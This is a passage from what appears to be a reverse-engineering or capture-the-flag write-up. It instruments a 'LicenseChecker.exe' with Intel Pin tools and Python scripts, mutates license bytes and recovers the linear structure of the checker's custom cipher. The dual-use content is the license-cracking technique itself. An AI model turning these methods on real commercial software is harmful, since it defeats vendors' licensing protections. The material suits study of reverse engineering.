INS_InsertThenCall(ins, IPOINT_BEFORE, (AFUNPTR)LogRegs, IARG_THREAD_ID, IARG_REG_VALUE, REG_RAX, IARG_REG_VALUE, REG_RCX, IARG_END);
}

static VOID Fini(INT32 /*code*/, VOID* /*v*/) {
if (g_fp) std::fclose(g_fp);
}

int main(int argc, char* argv[]) {
PIN_InitSymbols();
if (PIN_Init(argc, argv)) return 1;
g_tls = PIN_CreateThreadDataKey(nullptr);
PIN_InitLock(&g_lock);
g_fp = std::fopen(KnobOut.Value().c_str(), "wb");
if (!g_fp) return 2;
std::fprintf(g_fp, "===== MatryTrace start =====\n");
std::fprintf(g_fp, "out=%s, call_rva=0x%llX\n", KnobOut.Value().c_str(), (unsigned long long)KnobCallRva.Value());
std::fflush(g_fp);
IMG_AddInstrumentFunction(ImageLoad, nullptr);
INS_AddInstrumentFunction(Instruction, nullptr);
PIN_AddThreadStartFunction(ThreadStart, nullptr);
PIN_AddThreadFiniFunction(ThreadFini, nullptr);
PIN_AddFiniFunction(Fini, nullptr);
PIN_StartProgram();
return 0;
}

From the output log, we can see that the two int64 0xEFB1957A03BAECF7, 0x8C982983781BCDB6 continuously appearing throughout the entire log. And every int64 input turns to a new int64 after the process, abbreviate them as Res0~Res3. In the end, after Res3 is generated, Res0 appears again and finally an int64 is produced, the value of this int64 is Res0 >> 1. Try to modify every byte of the license and observe the resulting changes:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
import re
from dataclasses import dataclass
from collections import Counter
from typing import Optional, Tuple, Dict, List

RX = re.compile(r'^(rax|rcx)\s*=\s*0x([0-9a-fA-F]+)\s*$')

@dataclass
class Entry:
value: int
lineno: int

def parse_log_values(path: str, min_digits: int = 15) -> List[Entry]:
out: List[Entry] = []
with open(path, "r", encoding="utf-8", errors="ignore") as f:
for i, line in enumerate(f, 1):
s = line.strip()
m = RX.match(s)
if not m: continue
hexstr = m.group(2)
if len(hexstr) < min_digits: continue
v = int(hexstr, 16)
out.append(Entry(v, i))
return out

def qwords_from_32bytes(buf32: bytes) -> List[int]:
assert len(buf32) == 32
return [int.from_bytes(buf32[i:i+8], "little") for i in range(0, 32, 8)]

def first_occurrence_map(entries: List[Entry]) -> Dict[int, int]:
first: Dict[int, int] = {}
for e in entries:
if e.value not in first: first[e.value] = e.lineno
return first

def diff_byte_positions_le(a: int, b: int) -> List[int]:
ba = a.to_bytes(8, "little", signed=False)
bb = b.to_bytes(8, "little", signed=False)
return [i for i in range(8) if ba[i] != bb[i]]

def format_bytes_le(x: int) -> str:
b = x.to_bytes(8, "little", signed=False)
return " ".join(f"{v:02x}" for v in b)

def set_only(entriesA, entriesB):
setA = set(e.value for e in entriesA)
setB = set(e.value for e in entriesB)
return setA - setB, setB - setA

def pick_earliest_from_set(only_set, first_line, forbid_values, forbid_keys):
best_v = None
best_ln = 10**18
for v in only_set:
if (v & 0xffffffff) == 0:
continue
if v in forbid_values:
continue
if forbid_keys and v in forbid_keys:
continue
ln = first_line.get(v, 10**18)
if ln < best_ln:
best_ln = ln
best_v = v
if best_v is None:
return None
return (best_v, best_ln)

def find_round_diff_value_set_based(logA: str, logB: str, inputA_32: bytes, inputB_32: bytes, min_digits: int = 15, forbid_keys: set[int] | None = None):
A = parse_log_values(logA, min_digits=min_digits)
B = parse_log_values(logB, min_digits=min_digits)
onlyA, onlyB = set_only(A, B)
firstA = first_occurrence_map(A)
firstB = first_occurrence_map(B)
forbid_values = set(qwords_from_32bytes(inputA_32)) | set(qwords_from_32bytes(inputB_32))

candA = pick_earliest_from_set(onlyA, firstA, forbid_values, forbid_keys)
candB = pick_earliest_from_set(onlyB, firstB, forbid_values, forbid_keys)
return candA, candB

import os
import subprocess
from pathlib import Path
from typing import Tuple, Optional
from pick_round_diff import find_round_diff_value_set_based, diff_byte_positions_le, format_bytes_le

PIN_EXE = r"pin"
TOOL_DLL = r"Trace.dll"
TARGET_EXE= r"LicenseChecker.exe"
CALL_RVA = "0x120B"

BASE_STR = b"12345678901234567890123456789012"
assert len(BASE_STR) == 32

WORKDIR = Path(".").resolve()
LICENSE_PATH = WORKDIR / "license.bin"
LOG_BASE = WORKDIR / "log_base.txt"
LOG_CUR = WORKDIR / "log.txt"
OUT_MAP = WORKDIR / "map_result.txt"

def run_pin_and_collect(log_path: Path) -> None:
if log_path.exists(): log_path.unlink()
cmd = [PIN_EXE, "-t", str((WORKDIR / TOOL_DLL).resolve()), "-o", str(log_path), "-call_rva", CALL_RVA, "--", str((WORKDIR / TARGET_EXE).resolve())]
r = subprocess.run(cmd, cwd=str(WORKDIR), stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if r.returncode != 0:
print("[!] pin run returncode =", r.returncode)
if r.stdout.strip(): print("=== stdout ===\n", r.stdout)
if r.stderr.strip(): print("=== stderr ===\n", r.stderr)
if not log_path.exists() or log_path.stat().st_size == 0: raise RuntimeError(f"log not generated: {log_path}")

def write_license(buf32: bytes) -> None:
assert len(buf32) == 32
LICENSE_PATH.write_bytes(buf32)

def mutate_one_byte(base: bytes, pos: int) -> bytes:
b = bytearray(base)
orig = b[pos]
b[pos] = (orig + 1) & 0xFF
return bytes(b)

def ensure_baseline() -> None:
if LOG_BASE.exists() and LOG_BASE.stat().st_size > 0:
return
print("[*] generating baseline log_base.txt ...")
write_license(BASE_STR)
run_pin_and_collect(LOG_BASE)

FORBID_KEYS = {0xEFB1957A03BAECF7, 0x8C982983781BCDB6}

def analyze_pair(base32: bytes, cur32: bytes) -> Tuple[Optional[int], Optional[int], list[int]]:
candA, candB = find_round_diff_value_set_based(
str(LOG_BASE), str(LOG_CUR),
inputA_32=base32,
inputB_32=cur32,
min_digits=15,
forbid_keys=FORBID_KEYS,
)
if candA is None or candB is None:
return None, None, []
valA, lineA = candA
valB, lineB = candB
changed = diff_byte_positions_le(valA, valB)
return valA, valB, changed

def main():
ensure_baseline()

lines = []
lines.append("Base = " + BASE_STR.decode("ascii", "ignore"))
lines.append("Rule: pick unique (multiset extra), low32!=0, not plaintext qwords; if multiple, earliest line.\n")
lines.append("Output: block_idx byte_idx (within block) => changed bytes in round-diff qword (little-endian idx 0..7)\n")

for block in range(4):
for off in range(8):
pos = block * 8 + off
cur = mutate_one_byte(BASE_STR, pos)
write_license(cur)
run_pin_and_collect(LOG_CUR)
valA, valB, changed = analyze_pair(BASE_STR, cur)
orig_ch = BASE_STR[pos]
new_ch = cur[pos]
if valA is None or valB is None:
lines.append(f"[block{block} byte{off} pos{pos:02d}] {orig_ch:02x}->{new_ch:02x} !! no candidate found")
continue
lines.append(
f"[block{block} byte{off} pos{pos:02d}] {orig_ch:02x}->{new_ch:02x} "
f"diff_qword: A=0x{valA:016x} (le:{format_bytes_le(valA)}) "
f"B=0x{valB:016x} (le:{format_bytes_le(valB)}) "
f"changed_le_idx={changed}")

OUT_MAP.write_text("\n".join(lines), encoding="utf-8")
print("[+] wrote:", OUT_MAP)

if __name__ == "__main__":
main()

The output:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
[block0 byte0 pos00] 31->32 A=0x56f01199de97c803 B=0x50f01199de98cb33 changed_le_idx=[0, 1, 2, 7]
[block0 byte1 pos01] 32->33 A=0x56f01199de97c803 B=0x56f0119bdb96d803 changed_le_idx=[1, 2, 3, 4]
[block0 byte2 pos02] 33->34 A=0x56f01199de97c803 B=0x56f01f99d9e7c818 changed_le_idx=[0, 2, 3, 5]
[block0 byte3 pos03] 34->35 A=0x56f01199de97c803 B=0x56f21199ce97cd02 changed_le_idx=[0, 1, 3, 6]
[block0 byte4 pos04] 35->36 A=0x56f01199de97c803 B=0x56ff12aad897c803 changed_le_idx=[3, 4, 5, 6]
[block0 byte5 pos05] 36->37 A=0x56f01199de97c803 B=0x53f10099de97c801 changed_le_idx=[0, 5, 6, 7]
[block0 byte6 pos06] 37->38 A=0x56f01199de97c803 B=0x590f11aade97d603 changed_le_idx=[1, 4, 6, 7]
[block0 byte7 pos07] 38->39 A=0x56f01199de97c803 B=0x47f01498de95c803 changed_le_idx=[2, 4, 5, 7]

[block1 byte0 pos08] 39->3a A=0xa0c207ffba81fa8b B=0xa6c207ffba8ef9bb changed_le_idx=[0, 1, 2, 7]
[block1 byte1 pos09] 30->31 A=0xa0c207ffba81fa8b B=0xa0c207fdbf80ea8b changed_le_idx=[1, 2, 3, 4]
[block1 byte2 pos10] 31->32 A=0xa0c207ffba81fa8b B=0xa0c201ffb9b1fa84 changed_le_idx=[0, 2, 3, 5]
[block1 byte3 pos11] 32->33 A=0xa0c207ffba81fa8b B=0xa0c007ffaa81ff8a changed_le_idx=[0, 1, 3, 6]
[block1 byte4 pos12] 33->34 A=0xa0c207ffba81fa8b B=0xa0d90088b481fa8b changed_le_idx=[3, 4, 5, 6]
[block1 byte5 pos13] 34->35 A=0xa0c207ffba81fa8b B=0xa5c316ffba81fa89 changed_le_idx=[0, 5, 6, 7]
[block1 byte6 pos14] 35->36 A=0xa0c207ffba81fa8b B=0xa3f107f0ba81fc8b changed_le_idx=[1, 4, 6, 7]
[block1 byte7 pos15] 36->37 A=0xa0c207ffba81fa8b B=0xb1c202feba83fa8b changed_le_idx=[2, 4, 5, 7]

[block2 byte0 pos16] 37->38 A=0x86ac79d1be3b724d B=0x98ac79d1be087dbd changed_le_idx=[0, 1, 2, 7]
[block2 byte1 pos17] 38->39 A=0x86ac79d1be3b724d B=0x86ac79d3bb3a624d changed_le_idx=[1, 2, 3, 4]
[block2 byte2 pos18] 39->3a A=0x86ac79d1be3b724d B=0x86ac7fd1bd0b7242 changed_le_idx=[0, 2, 3, 5]
[block2 byte3 pos19] 30->31 A=0x86ac79d1be3b724d B=0x86ae79d1ae3b774c changed_le_idx=[0, 1, 3, 6]
[block2 byte4 pos20] 31->32 A=0x86ac79d1be3b724d B=0x86a37ae2b83b724d changed_le_idx=[3, 4, 5, 6]
[block2 byte5 pos21] 32->33 A=0x86ac79d1be3b724d B=0x83ad68d1be3b724f changed_le_idx=[0, 5, 6, 7]
[block2 byte6 pos22] 33->34 A=0x86ac79d1be3b724d B=0x81db79cabe3b7c4d changed_le_idx=[1, 4, 6, 7]
[block2 byte7 pos23] 34->35 A=0x86ac79d1be3b724d B=0x97ac7cd0be39724d changed_le_idx=[2, 4, 5, 7]

[block3 byte0 pos24] 35->36 A=0xecb4514916d3bc57 B=0xeab4514916dcbf67 changed_le_idx=[0, 1, 2, 7]
[block3 byte1 pos25] 36->37 A=0xecb4514916d3bc57 B=0xecb4514b13d2ac57 changed_le_idx=[1, 2, 3, 4]
[block3 byte2 pos26] 37->38 A=0xecb4514916d3bc57 B=0xecb44f491923bc64 changed_le_idx=[0, 2, 3, 5]
[block3 byte3 pos27] 38->39 A=0xecb4514916d3bc57 B=0xecb6514906d3b956 changed_le_idx=[0, 1, 3, 6]
[block3 byte4 pos28] 39->3a A=0xecb4514916d3bc57 B=0xecbb527a10d3bc57 changed_le_idx=[3, 4, 5, 6]
[block3 byte5 pos29] 30->31 A=0xecb4514916d3bc57 B=0xe9b5404916d3bc55 changed_le_idx=[0, 5, 6, 7]
[block3 byte6 pos30] 31->32 A=0xecb4514916d3bc57 B=0xef87514616d3ba57 changed_le_idx=[1, 4, 6, 7]
[block3 byte7 pos31] 32->33 A=0xecb4514916d3bc57 B=0xfdb4544816d1bc57 changed_le_idx=[2, 4, 5, 7]

shows that the round function for each qword is the same. Each byte will contribute to 4 bytes in the cipher.

Then try to use 4 same int 64, output shows that all values are indeed the same. Note that when input[0] is 01*8, the Res0 will be shr 3 times, while others will not, this means the program compares the result bit by bit.

Next, try to find the pattern:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
import os
import re
import subprocess
from pathlib import Path

PIN_EXE = r"pin"
TOOL_DLL = r"Trace.dll"
APP_EXE = r"LicenseChecker.exe"
WORKDIR = os.getcwd()
LICENSE_BIN = os.path.join(WORKDIR, "license.bin")
LOG_PATH = os.path.join(WORKDIR, "log.txt")
OUT_PATH = os.path.join(WORKDIR, "findpatterns_idx.txt")

K = 1
N = 0x10

INBYTE_TO_OUTIDX = {
0: [0, 1, 2, 7],
1: [1, 2, 3, 4],
2: [0, 2, 3, 5],
3: [0, 1, 3, 6],
4: [3, 4, 5, 6],
5: [0, 5, 6, 7],
6: [1, 4, 6, 7],
7: [2, 4, 5, 7],
}

RE_REGQ = re.compile(r"\b(?:rax|rcx)\s*=\s*0x([0-9a-fA-F]{15,16})\b")
RE_MARK = re.compile(r"\b(?:rax|rcx)\s*=\s*0xffffffffffffffff\b", re.I)
KEY_BLACKLIST = {0xEFB1957A03BAECF7, 0x8C982983781BCDB6}

def write_license(k0: int, val: int):
b = bytearray([0x01] * 8 + [0xFF] * 24)
b[k0] = val
with open(LICENSE_BIN, "wb") as f: f.write(b)
return bytes(b)

def run_pin():
cmd = [PIN_EXE, "-t", TOOL_DLL, "-o", LOG_PATH, "--", APP_EXE]
subprocess.run(cmd, cwd=WORKDIR, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=False)

def le_bytes(qword: int):
return qword.to_bytes(8, byteorder="little", signed=False)

def plaintext_qwords_from_license(lic: bytes):
s = set()
for off in range(0, 32, 8): s.add(int.from_bytes(lic[off:off+8], "little"))
return s

def is_candidate(v: int, plain_qwords: set):
if v in KEY_BLACKLIST: return False
if v in plain_qwords: return False
if (v & 0xFFFFFFFF) == 0: return False
return True

def extract_qword_from_log(log_path: str, plain_qwords: set):
p = Path(log_path)
if not p.exists(): return None
lines = p.read_text(errors="ignore").splitlines()
last = None
for i, line in enumerate(lines):
m = RE_REGQ.search(line)
if m:
v = int(m.group(1), 16)
if is_candidate(v, plain_qwords): last = (v, i, line)
if RE_MARK.search(line):
if last is not None: return last
return None

def main():
assert 1 <= K <= 8
k0 = K - 1
outidx = INBYTE_TO_OUTIDX[k0]
base_lic = write_license(k0, 0x01)
run_pin()
base_plain = plaintext_qwords_from_license(base_lic)
base = extract_qword_from_log(LOG_PATH, base_plain)
if not base: raise RuntimeError("baseline log parse failed (no candidate before first FF-marker)")
base_q, base_line, base_text = base
base_le = le_bytes(base_q)
with open(OUT_PATH, "w", encoding="utf-8") as f:
f.write(f"Base license = 8*01 + 24*FF, mutate k={K} (0-based {k0}), outidx={outidx}\n")
f.write(f"Baseline qword = 0x{base_q:016X} (line {base_line}) from: {base_text}\n")
f.write(f"Baseline LE bytes = {' '.join(f'{b:02x}' for b in base_le)}\n")
f.write("\n")
f.write("val qword(HEX) picked_LE_bytes_at_outidx changed_outidx\n")
f.write("-" * 90 + "\n")
max_delta = min(N, 0xFE)
for delta in range(0, max_delta + 1):
val = 0x01 + delta
if val == 0x00: continue
lic = write_license(k0, val)
run_pin()
plain = plaintext_qwords_from_license(lic)
got = extract_qword_from_log(LOG_PATH, plain)
if not got:
f.write(f"{val:02X} <parse failed>\n")
continue
q, ln, txt = got
le = le_bytes(q)
picked = [le[i] for i in outidx]
base_picked = [base_le[i] for i in outidx]
changed = [outidx[t] for t in range(len(outidx)) if picked[t] != base_picked[t]]
f.write(
f"{val:02X} 0x{q:016X} "
f"{' '.join(f'{b:02x}' for b in picked)} "
f"{changed}\n")
print(f"[+] Wrote: {OUT_PATH}")

if __name__ == "__main__":
main()

Output:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
01  0x411CD85F280546A1   a1 46 05 41   []
02 0x471CD85F280A4591 91 45 0a 47 [0, 1, 2, 7]
03 0x451CD85F280F4481 81 44 0f 45 [0, 1, 2, 7]
04 0x4B1CD85F281443F1 f1 43 14 4b [0, 1, 2, 7]
05 0x491CD85F281142E1 e1 42 11 49 [0, 1, 2, 7]
06 0x4F1CD85F281E41D1 d1 41 1e 4f [0, 1, 2, 7]
07 0x4D1CD85F281B40C1 c1 40 1b 4d [0, 1, 2, 7]
08 0x531CD85F28284F31 31 4f 28 53 [0, 1, 2, 7]
09 0x511CD85F282D4E21 21 4e 2d 51 [0, 1, 2, 7]
0A 0x571CD85F28224D11 11 4d 22 57 [0, 1, 2, 7]
0B 0x551CD85F28274C01 01 4c 27 55 [0, 1, 2, 7]
0C 0x5B1CD85F283C4B71 71 4b 3c 5b [0, 1, 2, 7]
0D 0x591CD85F28394A61 61 4a 39 59 [0, 1, 2, 7]
0E 0x5F1CD85F28364951 51 49 36 5f [0, 1, 2, 7]
0F 0x5D1CD85F28334841 41 48 33 5d [0, 1, 2, 7]
10 0x631CD85F285056B1 b1 56 50 63 [0, 1, 2, 7]
11 0x611CD85F285557A1 a1 57 55 61 [1, 2, 7]

We can see strong linear patterns in the cipher’s 4 bytes. Use bit-change to xor the delta and build the equation:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
import os
import re
import subprocess
from pathlib import Path

PIN_EXE = r"pin"
TOOL_DLL = r"Trace.dll"
APP_EXE = r"LicenseChecker.exe"
WORKDIR = os.getcwd()
LICENSE_BIN = os.path.join(WORKDIR, "license.bin")
LOG_PATH = os.path.join(WORKDIR, "log.txt")
OUT_PATH = os.path.join(WORKDIR, "findpatterns_idx.txt")

BASE_HEAD_BYTE = 0x11
TAIL_BYTE = 0xFF
HEAD_LEN = 8
TAIL_LEN = 24
MARKER_N = 0
DEBUG_EACH_RUN = True

INBYTE_TO_OUTIDX = {
0: [0, 1, 2, 7],
1: [1, 2, 3, 4],
2: [0, 2, 3, 5],
3: [0, 1, 3, 6],
4: [3, 4, 5, 6],
5: [0, 5, 6, 7],
6: [1, 4, 6, 7],
7: [2, 4, 5, 7],
}

RE_REGQ = re.compile(r"\b(rax|rcx)\s*=\s*0x([0-9a-fA-F]{15,16})\b")
KEY_BLACKLIST = {0xEFB1957A03BAECF7, 0x8C982983781BCDB6}
MARK_STR = "0xffffffffffffffff"

def run_pin():
cmd = [PIN_EXE, "-t", TOOL_DLL, "-o", LOG_PATH, "--", APP_EXE]
subprocess.run(cmd, cwd=WORKDIR, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=False)

def le_bytes(qword: int): return qword.to_bytes(8, byteorder="little", signed=False)

def fmt_hex_bytes(bb: bytes): return " ".join(f"{x:02x}" for x in bb)

def plaintext_qwords_from_license(lic: bytes):
s = set()
for off in range(0, 32, 8): s.add(int.from_bytes(lic[off:off+8], "little", signed=False))
return s

def is_candidate(v: int, plain_qwords: set):
if v in KEY_BLACKLIST: return False
if v in plain_qwords: return False
if (v & 0xFFFFFFFF) == 0: return False
return True

def write_license_from_head(head8: bytes):
assert len(head8) == HEAD_LEN
lic = bytearray(head8 + bytes([TAIL_BYTE]) * TAIL_LEN)
if 0 in lic: raise ValueError("license contains 0x00 -> would be truncated by strlen")
with open(LICENSE_BIN, "wb") as f: f.write(lic)
return bytes(lic)

def extract_qword_from_log(log_path: str, plain_qwords: set, marker_n: int, dbg_tag: str = ""):
p = Path(log_path)
if not p.exists(): return None
lines = p.read_text(errors="ignore").splitlines()
last = None
marker_cnt = -1
for i, line in enumerate(lines):
m = RE_REGQ.search(line)
if m:
reg = m.group(1).lower()
v = int(m.group(2), 16)
if is_candidate(v, plain_qwords): last = (v, i, reg, line)
if MARK_STR in line.lower():
marker_cnt += 1
if marker_cnt == marker_n:
if DEBUG_EACH_RUN:
if last:
v, li, reg, ltxt = last
print(f"[dbg:{dbg_tag}] hit marker#{marker_cnt} at L{i}, pick L{li} {reg}=0x{v:016X}")
else: print(f"[dbg:{dbg_tag}] hit marker#{marker_cnt} at L{i}, but no candidate before it")
return (last, i, line)
if DEBUG_EACH_RUN: print(f"[dbg:{dbg_tag}] no marker#{marker_n} found, markers_seen={marker_cnt+1}")
return None

def main():
base_head = bytes([BASE_HEAD_BYTE] * HEAD_LEN)
base_lic = write_license_from_head(base_head)
run_pin()
base_plain = plaintext_qwords_from_license(base_lic)
base_ret = extract_qword_from_log(LOG_PATH, base_plain, MARKER_N, dbg_tag="base")
if not base_ret or not base_ret[0]: raise RuntimeError("baseline log parse failed (no candidate before selected marker)")
(base_pick, base_marker_line, base_marker_text) = base_ret
base_q, base_line, base_reg, base_text = base_pick
base_le = le_bytes(base_q)

with open(OUT_PATH, "w", encoding="utf-8") as f:
f.write(f"Base license: head=({fmt_hex_bytes(base_head)}), tail={TAIL_LEN}*FF\n")
f.write(f"MARKER_N={MARKER_N} (0=first 0xFFFFFFFFFFFFFFFF)\n")
f.write(f"Baseline marker line: {base_marker_line} text: {base_marker_text}\n")
f.write(f"Baseline picked: {base_reg}=0x{base_q:016X} (line {base_line}) text: {base_text}\n")
f.write(f"Baseline LE: {fmt_hex_bytes(base_le)}\n\n")
for pos in range(HEAD_LEN):
outidx = INBYTE_TO_OUTIDX[pos]
f.write(f"=== byte pos {pos} outidx={outidx} ===\n")
for bit in range(8):
mut = bytearray(base_head)
old = mut[pos]
mut[pos] ^= (1 << bit)
new = mut[pos]
if new == 0:
if DEBUG_EACH_RUN:
print(f"[dbg:pos{pos}bit{bit}] skip (would produce 0x00)")
f.write(f"pos{pos} bit{bit}: skip (0x00)\n")
continue
lic = write_license_from_head(bytes(mut))
run_pin()
plain = plaintext_qwords_from_license(lic)
tag = f"pos{pos}bit{bit} {old:02X}->{new:02X}"
got = extract_qword_from_log(LOG_PATH, plain, MARKER_N, dbg_tag=tag)
if not got or not got[0]:
f.write(f"pos{pos} bit{bit} : {old:02X}->{new:02X} <parse failed>\n")
continue
pick, marker_line, marker_text = got
q, ln, reg, txt = pick
le = le_bytes(q)
delta = bytes([le[i] ^ base_le[i] for i in range(8)])
picked = [le[i] for i in outidx]
picked_base = [base_le[i] for i in outidx]
picked_delta = [picked[t] ^ picked_base[t] for t in range(len(outidx))]
changed_outidx = [outidx[t] for t in range(len(outidx)) if picked[t] != picked_base[t]]
if DEBUG_EACH_RUN:
print(f"[dbg] pos{pos} bit{bit} {old:02X}->{new:02X} "
f"markerL{marker_line} pickL{ln} {reg}=0x{q:016X} "
f"picked_delta={fmt_hex_bytes(bytes(picked_delta))}")
f.write(
f"pos{pos} bit{bit} : {old:02X}->{new:02X} | "
f"pick {reg}=0x{q:016X} (L{ln}) | "
f"LE={fmt_hex_bytes(le)} | "
f"delta={fmt_hex_bytes(delta)} | "
f"picked@outidx={fmt_hex_bytes(bytes(picked))} | "
f"picked_delta={fmt_hex_bytes(bytes(picked_delta))} | "
f"changed_outidx={changed_outidx}\n")
f.write("\n")
print(f"[+] Wrote: {OUT_PATH}")

if __name__ == "__main__":
main()

The output:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
[dbg:base] hit marker#0 at L9295, pick L9265 rcx=0x306DA92E496427C0
[dbg:pos0bit0 11->10] hit marker#0 at L9306, pick L9276 rcx=0x326DA92E496126D0
[dbg] pos0 bit0 11->10 markerL9306 pickL9276 rcx=0x326DA92E496126D0 picked_delta=10 01 05 02
[dbg:pos0bit1 11->13] hit marker#0 at L9345, pick L9315 rcx=0x346DA92E496E25E0
[dbg] pos0 bit1 11->13 markerL9345 pickL9315 rcx=0x346DA92E496E25E0 picked_delta=20 02 0a 04
[dbg:pos0bit2 11->15] hit marker#0 at L9400, pick L9370 rcx=0x386DA92E49702380
[dbg] pos0 bit2 11->15 markerL9400 pickL9370 rcx=0x386DA92E49702380 picked_delta=40 04 14 08
[dbg:pos0bit3 11->19] hit marker#0 at L9374, pick L9344 rcx=0x206DA92E494C2F40
[dbg] pos0 bit3 11->19 markerL9374 pickL9344 rcx=0x206DA92E494C2F40 picked_delta=80 08 28 10
[dbg:pos0bit4 11->01] hit marker#0 at L9355, pick L9325 rcx=0x106DA92E493436C0
[dbg] pos0 bit4 11->01 markerL9355 pickL9325 rcx=0x106DA92E493436C0 picked_delta=00 11 50 20
[dbg:pos0bit5 11->31] hit marker#0 at L9303, pick L9273 rcx=0x706DA92E49C405C0
[dbg] pos0 bit5 11->31 markerL9303 pickL9273 rcx=0x706DA92E49C405C0 picked_delta=00 22 a0 40
[dbg:pos0bit6 11->51] hit marker#0 at L9347, pick L9317 rcx=0xB06DA92E482463C0
[dbg] pos0 bit6 11->51 markerL9347 pickL9317 rcx=0xB06DA92E482463C0 picked_delta=00 44 40 80
[dbg:pos0bit7 11->91] hit marker#0 at L9364, pick L9334 rcx=0x306DA92F4BE4AFC0
[dbg] pos0 bit7 11->91 markerL9364 pickL9334 rcx=0x306DA92F4BE4AFC0 picked_delta=00 88 80 00
[dbg:pos1bit0 11->10] hit marker#0 at L9336, pick L9306 rcx=0x306DA92C4C6537C0
[dbg] pos1 bit0 11->10 markerL9336 pickL9306 rcx=0x306DA92C4C6537C0 picked_delta=10 01 05 02
[dbg:pos1bit1 11->13] hit marker#0 at L9377, pick L9347 rcx=0x306DA92A436607C0
...

Build linear model:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
def A(x): return (x << 4) & 0xFF
def B(x): return x ^ (x >> 4)
def C(x): return x ^ ((x << 2) & 0xFF)
def D(x): return (x << 1) & 0xFF
def E(x): return x ^ ((x << 4) & 0xFF)
def T(???): ???

def L(state):
out = [0] * 8
out[0] = A(state[0]) ^ C(state[2]) ^ B(state[3]) ^ D(state[5])
out[1] = B(state[0]) ^ A(state[1]) ^ C(state[3]) ^ D(state[6])
out[2] = C(state[0]) ^ B(state[1]) ^ A(state[2]) ^ D(state[7])
out[3] = C(state[1]) ^ B(state[2]) ^ A(state[3]) ^ D(state[4])
out[4] = D(state[1]) ^ E(state[4]) ^ C(state[6]) ^ B(state[7])
out[5] = D(state[2]) ^ B(state[4]) ^ E(state[5]) ^ C(state[7])
out[6] = D(state[3]) ^ C(state[4]) ^ B(state[5]) ^ E(state[6])
out[7] = D(state[0]) ^ C(state[5]) ^ B(state[6]) ^ E(state[7])
K = [0xB7, 0x50, 0x13, 0x3E, 0x48, 0xCF, 0x0B, 0x56]
return [out[i] ^ K[i] ^ T(???) for i in range(8)]

The part T is an array only contains 0~3, but the value of it is complex. Optimize pin script:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
#include "pin.H"
#include <string>
#include <algorithm>
#include <cstdio>
#include <cstdint>

KNOB<std::string> KnobOut(KNOB_MODE_WRITEONCE, "pintool", "o", "rcx_result.txt", "result output file");
KNOB<UINT64> KnobCallRva(KNOB_MODE_WRITEONCE, "pintool", "call_rva", "0x120B", "RVA of 'call rsi' in Doll.dll");
KNOB<UINT64> KnobSentinel(KNOB_MODE_WRITEONCE, "pintool", "sentinel", "0xEEEEEEEEEEEEEEEE", "stop sentinel RCX");
KNOB<UINT32> KnobMinHexDigits(KNOB_MODE_WRITEONCE, "pintool", "min_hex_digits", "14", "valid RCX min hex digits (14 or 15)");

static ADDRINT g_callsite = 0;
static TLS_KEY g_tls;
static FILE* g_fp = nullptr;
static PIN_LOCK g_lock;
static volatile bool g_done = false;

struct TData {
bool in_sc = false;
ADDRINT sc_lo = 0, sc_hi = 0;
ADDRINT last_va_base = 0;
ADDRINT last_va_size = 0;
UINT64 last_seen_rcx = UINT64(-1);
UINT64 last_valid_rcx = 0;
bool has_valid = false;
};

static inline std::string ToLower(std::string s) {
std::transform(s.begin(), s.end(), s.begin(), [](unsigned char c){ return (char)std::tolower(c); });
return s;
}

static inline UINT32 HexDigits(UINT64 v) {
if (v == 0) return 1;
UINT32 n = 0;
while (v) { v >>= 4; ++n; }
return n;
}

static TData* GetTD(THREADID tid) {
return reinterpret_cast<TData*>(PIN_GetThreadData(g_tls, tid));
}

static VOID ThreadStart(THREADID tid, CONTEXT*, INT32, VOID*) {
TData* td = new TData();
